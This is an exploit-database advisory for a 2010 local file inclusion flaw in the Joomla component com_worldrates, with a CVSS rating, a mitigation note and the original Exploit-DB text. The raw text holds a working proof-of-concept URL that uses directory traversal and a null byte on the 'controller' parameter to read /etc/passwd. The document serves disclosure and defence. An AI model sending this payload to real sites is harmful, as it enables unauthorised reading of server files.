Joomla Component World Rates Local File Inclusion Vulnerability

vendor:

com_worldrates

by:

AntiSecurity

7,5

CVSS

HIGH

Local File Inclusion

CWE

Product Name: com_worldrates

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2010

Joomla Component World Rates Local File Inclusion Vulnerability

A Local File Inclusion (LFI) vulnerability exists in the Joomla Component World Rates. An attacker can exploit this vulnerability to include arbitrary files from the local system, which can lead to the disclosure of sensitive information. The vulnerability is due to insufficient sanitization of user-supplied input to the 'controller' parameter in the 'index.php' script. An attacker can exploit this vulnerability by sending a maliciously crafted HTTP request to the vulnerable script. Successful exploitation of this vulnerability can result in the disclosure of sensitive information, such as the contents of the '/etc/passwd' file.

Mitigation:

Input validation should be used to prevent the exploitation of this vulnerability. All user-supplied input should be validated and filtered before being used in the application.

Source

Exploit-DB raw data:

================================================================================================================


  [o] Joomla Component World Rates Local File Inclusion Vulnerability
 
       Software : com_worldrates
       Vendor   : http://dev.pucit.edu.pk/
       Download : http://dev.pucit.edu.pk/files/worldrates.zip
       Author   : AntiSecurity [ Vrs-hCk NoGe OoN_BoY Paman zxvf s4va ]
       Contact  : public[at]antisecurity[dot]org
       Home     : http://antisecurity.org/


================================================================================================================


  [o] Exploit

       http://localhost/[path]/index.php?option=com_worldrates&controller=[LFI]


  [o] PoC

       http://localhost/index.php?option=com_worldrates&controller=../../../../../../../../../../etc/passwd%00


================================================================================================================


  [o] Greetz

       Angela Zhang stardustmemory aJe martfella pizzyroot Genex
       H312Y yooogy mousekill }^-^{ noname matthews s4va wishnusakti
       skulmatic OLiBekaS ulga Cungkee k1tk4t str0ke kaka11


================================================================================================================


  [o] April 12 2010 - GMT +07:00 Jakarta, Indonesia